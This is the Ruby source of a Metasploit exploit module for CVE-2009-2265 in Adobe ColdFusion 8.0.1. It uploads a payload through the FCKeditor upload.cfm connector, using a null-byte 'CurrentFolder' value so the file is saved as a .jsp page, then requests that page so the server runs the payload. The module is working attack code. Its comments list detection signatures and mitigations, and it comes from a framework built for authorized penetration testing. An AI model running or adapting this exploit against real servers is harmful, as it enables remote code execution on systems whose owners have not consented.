Path: blob/master/modules/exploits/windows/http/coldfusion_fckeditor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2009-2265: the FCKeditor file-upload connector
# shipped with Adobe ColdFusion 8.0.1 takes a caller-supplied 'CurrentFolder'
# query value, which the code below uses to choose the name under which the
# uploaded content is later requested.
#
# Defender notes, derived only from what this module sends:
#   * Detection: a POST to the connector's upload.cfm whose query string has
#     Command=FileUpload and a CurrentFolder value ending in ".jsp%00",
#     followed by a GET for a .jsp file under /userfiles/file/.
#   * Artifact: the uploaded .jsp stays on disk; nothing in this module
#     removes it afterwards.
#   * Mitigation: apply the vendor fix for CVE-2009-2265 and restrict or
#     disable the FCKeditor file-manager connector where it is not needed.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Declares the module metadata and its single user-settable option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    # One Java-architecture target; NOP generation is switched off for it.
    universal_target = [
      'Universal Windows Target',
      {
        'Arch' => ARCH_JAVA,
        'Payload' =>
        {
          'DisableNops' => true,
        },
      }
    ]

    # NOTE(review): all three values are still the UNKNOWN_* placeholders.
    # The exploit method writes a file to the target and never deletes it, so
    # the side-effects entry looks like a candidate for an explicit value.
    module_notes = {
      'Reliability' => UNKNOWN_RELIABILITY,
      'Stability' => UNKNOWN_STABILITY,
      'SideEffects' => UNKNOWN_SIDE_EFFECTS
    }

    super(
      update_info(
        info,
        'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',
        'Description' => %q{
          This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload
          and Execute vulnerability.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Privileged' => true,
        'References' => [
          [ 'CVE', '2009-2265' ],
          [ 'OSVDB', '55684'],
        ],
        'Targets' => [
          universal_target,
        ],
        'DefaultOptions' => {
          'SHELL' => 'cmd.exe'
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-07-03',
        'Notes' => module_notes
      )
    )

    # Optional override for the connector location; the default is the path
    # given in the option definition below.
    connector_option = OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ])
    register_options([ connector_option ])
  end

  # Uploads the encoded payload through the connector, then requests the
  # stored file once so that the server runs it.
  #
  # Request shape, for anyone matching this traffic in logs: the POST carries
  # a single multipart part named "newfile" with a random 8-letter ".txt"
  # filename and the content type application/x-java-archive, while the
  # CurrentFolder query value holds a random ".jsp" name followed by "%00".
  #
  # @return [void]
  def exploit
    # Random upper-case name of 1 to 10 letters, with a .jsp extension.
    jsp_name = "#{rand_text_alpha_upper(rand(10) + 1)}.jsp"

    form = Rex::MIME::Message.new
    form.add_part(
      payload.encoded,
      "application/x-java-archive",
      nil,
      "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\""
    )
    # Leading and trailing whitespace is trimmed from the serialised form.
    body = form.to_s.strip

    print_status("Sending our POST request...")

    upload_request = {
      'uri' => normalize_uri(datastore['FCKEDITOR_DIR']),
      'query' => "Command=FileUpload&Type=File&CurrentFolder=/#{jsp_name}%00",
      'version' => '1.1',
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => body,
    }
    # Second argument is the response timeout in seconds.
    res = send_request_cgi(upload_request, 5)

    # Success is judged by HTTP 200 plus the connector's completion marker.
    uploaded = res && res.code == 200 && res.body =~ /OnUploadCompleted/
    unless uploaded
      print_error("Upload Failed...")
      return
    end

    print_status("Upload succeeded! Executing payload...")

    # default path in Adobe ColdFusion 8.0.1.
    # NOTE(review): this path is fixed and does not go through normalize_uri.
    fetch_request = {
      'uri' => "/userfiles/file/#{jsp_name}",
      'method' => 'GET',
    }
    send_request_raw(fetch_request, 5)

    handler
  end
end